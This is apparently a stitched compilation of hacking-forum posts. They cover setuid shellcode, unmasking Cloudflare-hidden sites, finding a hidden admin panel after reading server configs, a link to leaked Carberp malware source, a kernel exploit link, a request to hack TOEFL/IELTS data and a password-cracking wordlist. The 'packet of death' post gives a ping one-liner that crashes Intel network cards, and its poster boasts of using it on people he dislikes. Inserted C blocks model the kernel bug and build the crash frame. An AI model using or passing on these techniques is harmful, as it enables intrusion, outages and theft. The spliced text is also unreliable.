I wrote the following x86 shellcode for a wargame and I thought I would share it here so you guys can mess with it. The shellcode calls setresuid first in order to execute with maximum privileges when you are exploiting a setuid binary. Then it calls execve to spawn a shell. This is probably the most basic shellcode and is only suitable for local exploitation.
Pseudocode:
Assembly:
To turn this assembly into usable shellcode you will have to assemble it into an ELF executable, and then extract the shellcode from that. You will need nasm to assemble the file:
You can then use objdump to dump the .text section (instructions) of the binary you just built:
There is an easy way to uncover someone's website hiding behind Cloudflare: just go to the URL below, type the domain name and click Search:
http://www.cloudflare-watch.org/cfs.html
Enuff with some shit!
Hello everybody,
Today I have a new way to get the real admincp.
When you read the config (via symlink or other methods),
you get something like this:
http://upload.traidnt.net/upfiles/4q708934.png
But when you try to browse /admincp you get:
http://upload.traidnt.net/upfiles/7NQ09002.png
Okay, to get the real admincp, connect to MySQL and execute this query:
http://upload.traidnt.net/upfiles/e4W09043.png
SELECT location FROM session;
And you will get the real URL:
http://upload.traidnt.net/upfiles/0rU09149.png
Real admincp: /1337b0x/
http://upload.traidnt.net/upfiles/Bdr09200.png
Zuhahahaha
Done Brothers
Greets 2 H4x04L1f3 // Shadow008 // Sniffer // Every Madleets Members
See You
./b0x
As many of you probably already know, the source code to Carberp malware has been leaked online. If you hadn't heard about this, please see http://www.pcworld.com/article/2042930/source-code-for-carberp-financial...
Due to the large number of emails we have received, we have put it in the VIP area at https://www.soldierx.com/sxonly/VIP-Downloads
Enjoy
Just in case you've been living under a rock, please grab it at http://grsecurity.net/~spender/exploits/enlightenment.tgz (abacus is the new exploit).
Here is a bit of a write-up that appeared on reddit:
Vuln involves the event_id variable in kernel/events/core.c:perf_swevent_init(), which is a signed integer with only its upper bound checked. On close of the event, it will do:
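The write-up breaks off before the close-path code, so here is a user-space C model, added as an example and not taken from the reddit post or from any kernel source, of why a signed id with only an upper-bound check is enough to corrupt memory: the 64-bit config value is truncated into a signed int, a value such as 0xffffffff becomes -1, passes `>= MAX`, and the decrement done on close lands just below the table. The hardened variant keeps the id unsigned so the same value is rejected. The names (`vulnerable_lookup`, `model_dec`, `struct model`), the SW_MAX value and the 4-byte entry size are my assumptions; nothing here touches the kernel.

```c
/* swevent_model.c: added example modelling the signed-index check the
 * write-up describes. All names and sizes are assumptions of this example. */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SW_MAX 9   /* stands in for PERF_COUNT_SW_MAX; exact value assumed */

/* A slice of "kernel memory": neighbour stands in for whatever object
 * happens to sit just below the enabled[] table. */
struct model {
    int neighbour;
    int enabled[SW_MAX];
};

/* Vulnerable check: the id is a signed int and only its upper bound is
 * tested. Returns 0 and the index that will be used, or -ENOENT. */
int vulnerable_lookup(unsigned long long config, long *index)
{
    int event_id = (int)config;      /* 64-bit config truncated to signed int */
    if (event_id >= SW_MAX)
        return -ENOENT;              /* a negative event_id sails through */
    *index = event_id;
    return 0;
}

/* Hardened check: keep the id unsigned, so a "negative" value is a huge
 * positive one and fails the same comparison. */
int fixed_lookup(unsigned long long config, long *index)
{
    if (config >= SW_MAX)
        return -ENOENT;
    *index = (long)config;
    return 0;
}

/* Model of the decrement done on close: enabled[index]--. The address is
 * computed relative to the struct so an out-of-range index lands on
 * neighbour, as an unchecked index would in the kernel; a write that would
 * leave the struct entirely is refused to keep this model memory-safe. */
int model_dec(struct model *m, long index)
{
    long off = (long)offsetof(struct model, enabled) + index * (long)sizeof(int);
    if (off < 0 || off + (long)sizeof(int) > (long)sizeof(struct model))
        return -EFAULT;
    int *slot = (int *)((char *)m + off);
    (*slot)--;
    return 0;
}

int close_event_vulnerable(struct model *m, unsigned long long config)
{
    long idx;
    int rc = vulnerable_lookup(config, &idx);
    return rc ? rc : model_dec(m, idx);
}

int close_event_fixed(struct model *m, unsigned long long config)
{
    long idx;
    int rc = fixed_lookup(config, &idx);
    return rc ? rc : model_dec(m, idx);
}

int main(void)
{
    struct model m;
    memset(&m, 0, sizeof m);
    int rc = close_event_vulnerable(&m, 0xffffffffULL);
    printf("vulnerable: rc=%d neighbour=%d (should be untouched, is not)\n",
           rc, m.neighbour);
    memset(&m, 0, sizeof m);
    rc = close_event_fixed(&m, 0xffffffffULL);
    printf("fixed:      rc=%d neighbour=%d\n", rc, m.neighbour);
    return 0;
}
```

The point to take from the model is that the bound check is correct for every value the author expected and wrong for every value the attacker chooses: the comparison must be done in the type the value actually arrives in, not in a narrower signed one.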
Saw an interesting link today about various places to sell exploit code to. Figured I would share it:
http://bugcrowd.com/list-of-bug-bounty-programs/
Does anybody have any thoughts/comments/opinions on selling exploits/bugs?
VERY URGENT!!! Is there anyone who can help me hack TOEFL or IELTS data? Your help will be highly appreciated.
I've been trying forever to get a combo of ettercap ARP spoofing and BeEF working. I have found one proxy that fits the bill, but it's slow (so slow, in fact, that it is just about unusable) and will not always hook the victim into BeEF. Has anyone had success with something like this?
The handsome fellow at Defuse Security's Crackstation Project (It's a one-man operation) a couple days ago released a massive dictionary list on a PAY-WTF-YOU-WANT model:
That link again is: http://crackstation.net/buy-crackstation-wordlist-password-cracking-dict...
Since he tweeted it, here's the TPB torrent and magnet link in case of website issues:
https://thepiratebay.se/torrent/8159583
magnet:?xt=urn:btih:fd62cc1d79f595cbe1de6356fb13c2165994e469&dn=CrackStation.Password.Cracking.Dictionary&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Ftracker.publicbt.com%3A80&tr=udp%3A%2F%2Ftracker.istole.it%3A6969&tr=udp%3A%2F%2Ftracker.ccc.de%3A80
Now, I know all you 1337 h4><0|2z out there probably have your own fantastical list that may be even better, but this is pretty awesome. If you can afford it, consider throwing this generous, manly man with a behemoth of an epeen $13.37 or even a scrumptious $1.34 (because rounding). He also takes bitcoins.
And yes, I'm plugging the shit out of this because I know half of you are going to grab this delicious, gourmet 15GB text file.
http://dshield.org/diary/Intel+Network+Card+82574L+Packet+of+Death/15109
Apparently it only affects gigabit controllers using a specific Intel chipset.
I ran this against a few chumps I dislike, and one of them definitely went down for the count.
=================================================================
An interesting blog post by Kristian Kielhofer describes how a specific SIP packet can "kill" an Intel Gigabit ethernet card [1]. If a card is exposed to this traffic, the system has to be physically power cycled. A reboot will not recover the system.
The network card crashed whenever the value 0x32 or 0x33 was found at offset 0x47f. Kristian first noticed this happening for specific SIP packets, but in the end, it turned out that any packet with 0x32 at 0x47f caused the crash. Intel traced the problem to an EEPROM used in this specific card (82574L). There are some links in the comments to the blog suggesting that others have run into this problem before. For example, the command "ping -p 32 -s 1110 x.x.x.x" can crash an affected card remotely.
[Update] A few asked why this doesn't happen just randomly every 128th packet: Once the card receives the value "0x34" in this position, it appears to be no longer vulnerable. There are also a number of earlier bug reports about this card that sound very similar, and appear to be related to ASPM, a PCI power save feature. Kristian claims he eliminated this issue. If you try to reproduce this issue, power up the system and then issue the "ping" command shown above quickly after reboot in order to avoid the "inoculation" with 0x34. We would like to hear any reports of being able to reproduce (or not) this issue.
There are also some reports about similar issues in certain 3G USB modems.
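To see why `ping -p 32 -s 1110` puts 0x32 at frame offset 0x47f (14-byte Ethernet header + 20-byte IPv4 header + 8-byte ICMP header + 1110 data bytes = 0x480 bytes, so 0x47f is the last byte of the frame) and to have a detection check you can run over captured frames, here is a C example added here; it is not code from the diary or from Kristian's post. It builds the frame that ping would send, with dummy MAC and IP addresses, and classifies a frame as "packet of death" (0x32/0x33 at 0x47f) or "inoculation" (0x34 at 0x47f) exactly as the diary describes. The checksum routine and the function names are mine.

```c
/* pod82574.c: added example. Builds the Ethernet/IPv4/ICMP echo frame that
 * "ping -p PATTERN -s DATALEN" produces and checks the byte the diary names.
 * Addresses are dummies; the offsets are header arithmetic. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ETH_HLEN     14
#define IP_HLEN      20
#define ICMP_HLEN    8
#define DEATH_OFFSET 0x47f   /* frame offset reported in the diary */

/* RFC 1071 Internet checksum over buf. Returns the value to place in the
 * checksum field; recomputing over a finished header yields 0. */
uint16_t inet_csum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)((buf[i] << 8) | buf[i + 1]);
    if (len & 1)
        sum += (uint32_t)(buf[len - 1] << 8);
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Write an untagged Ethernet frame carrying an ICMP echo request with
 * datalen payload bytes filled with pattern. Returns the frame length, or
 * 0 if out is too small or the IP length field would overflow. Real ping
 * overwrites the first payload bytes with a timestamp; that never reaches
 * the last byte, which is the one that matters here. */
size_t build_ping_frame(uint8_t *out, size_t outsz, size_t datalen, uint8_t pattern)
{
    size_t iplen = IP_HLEN + ICMP_HLEN + datalen;
    size_t total = ETH_HLEN + iplen;
    if (total > outsz || iplen > 0xffff)
        return 0;
    memset(out, 0, total);

    /* Ethernet: dst MAC, src MAC, EtherType 0x0800 (IPv4); dummy MACs */
    memcpy(out, "\x00\x11\x22\x33\x44\x55", 6);
    memcpy(out + 6, "\x66\x77\x88\x99\xaa\xbb", 6);
    out[12] = 0x08; out[13] = 0x00;

    /* IPv4 header: version/IHL, total length, TTL, protocol, addresses */
    uint8_t *ip = out + ETH_HLEN;
    ip[0] = 0x45;
    ip[2] = (uint8_t)(iplen >> 8); ip[3] = (uint8_t)(iplen & 0xff);
    ip[8] = 64;                      /* TTL */
    ip[9] = 1;                       /* ICMP */
    memcpy(ip + 12, "\xc0\xa8\x00\x01", 4);   /* 192.168.0.1 (dummy) */
    memcpy(ip + 16, "\xc0\xa8\x00\x02", 4);   /* 192.168.0.2 (dummy) */
    uint16_t c = inet_csum(ip, IP_HLEN);
    ip[10] = (uint8_t)(c >> 8); ip[11] = (uint8_t)(c & 0xff);

    /* ICMP echo request: type 8, code 0, id/seq left 0, then the payload */
    uint8_t *icmp = ip + IP_HLEN;
    icmp[0] = 8;
    memset(icmp + ICMP_HLEN, pattern, datalen);
    c = inet_csum(icmp, ICMP_HLEN + datalen);
    icmp[2] = (uint8_t)(c >> 8); icmp[3] = (uint8_t)(c & 0xff);

    return total;
}

/* The diary's trigger condition: 0x32 or 0x33 at frame offset 0x47f. */
int is_packet_of_death(const uint8_t *frame, size_t len)
{
    if (len <= DEATH_OFFSET)
        return 0;
    return frame[DEATH_OFFSET] == 0x32 || frame[DEATH_OFFSET] == 0x33;
}

/* The diary's "inoculation": 0x34 at the same offset. */
int is_inoculation(const uint8_t *frame, size_t len)
{
    return len > DEATH_OFFSET && frame[DEATH_OFFSET] == 0x34;
}

int main(void)
{
    uint8_t frame[2000];
    size_t n = build_ping_frame(frame, sizeof frame, 1110, 0x32);
    printf("ping -p 32 -s 1110: %zu (0x%zx) byte frame, byte 0x47f = 0x%02x, "
           "packet of death: %s\n", n, n, frame[DEATH_OFFSET],
           is_packet_of_death(frame, n) ? "yes" : "no");
    n = build_ping_frame(frame, sizeof frame, 1110, 0x34);
    printf("ping -p 34 -s 1110: inoculation: %s\n",
           is_inoculation(frame, n) ? "yes" : "no");
    return 0;
}
```

The capture-side equivalent of `is_packet_of_death`, for an untagged interface, is the pcap filter `tcpdump -ni eth0 'ether[0x47f] = 0x32 or ether[0x47f] = 0x33'`. An 802.1Q tag shifts the whole frame by four bytes, and the 0x47f figure is the diary's, so validate the rule against a tagged capture before trusting its alerts.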